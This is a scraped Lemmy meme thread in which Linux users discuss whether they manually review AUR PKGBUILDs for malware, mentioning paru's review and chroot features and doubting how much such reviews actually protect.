TheTwelveYearOld@lemmy.world to linuxmemes@lemmy.worldEnglish · 21 hours agoPersonally I'm grateful to not need 3rd party packageslemmy.worldimagemessage-square60fedilinkarrow-up1403arrow-down18
arrow-up1395arrow-down1imagePersonally I'm grateful to not need 3rd party packageslemmy.worldTheTwelveYearOld@lemmy.world to linuxmemes@lemmy.worldEnglish · 21 hours agomessage-square60fedilink
minus-squareTechnus@lemmy.ziplinkfedilinkarrow-up63arrow-down2·20 hours agoDoes anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
minus-squareJackbyDev@programming.devlinkfedilinkEnglisharrow-up4·8 hours agoSort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
minus-squareprole@lemmy.blahaj.zonelinkfedilinkarrow-up3·edit-28 hours agoLook for comments that say “# THIS IS MALWARE”
minus-squaretomkatt@lemmy.worldlinkfedilinkEnglisharrow-up45·edit-218 hours agoI do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
minus-squareOverspark@feddit.nllinkfedilinkarrow-up7·14 hours agoYeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
minus-squareŜan@piefed.ziplinkfedilinkEnglisharrow-up6arrow-down3·11 hours agoI keep hearing people say ðis like it’s a defense against malware and supply chain attacks. Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”. What are you checking for in ðe PKGBUILD?
minus-square0xD@infosec.publinkfedilinkarrow-up2·11 hours agoAlso with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
minus-squarenesc@lemmy.cafelinkfedilinkEnglisharrow-up4·14 hours agoI do, also most aur-helpers skip or make reviewing a chore.
minus-squareAvicenna@lemmy.worldlinkfedilinkarrow-up2arrow-down1·11 hours agoat the risk of getting down voted I wonder if an LLM would spot it
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
Look for comments that say “# THIS IS MALWARE”
Yes, always!
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.
Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.
What are you checking for in ðe PKGBUILD?
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
I do, also most aur-helpers skip or make reviewing a chore.
at the risk of getting down voted I wonder if an LLM would spot it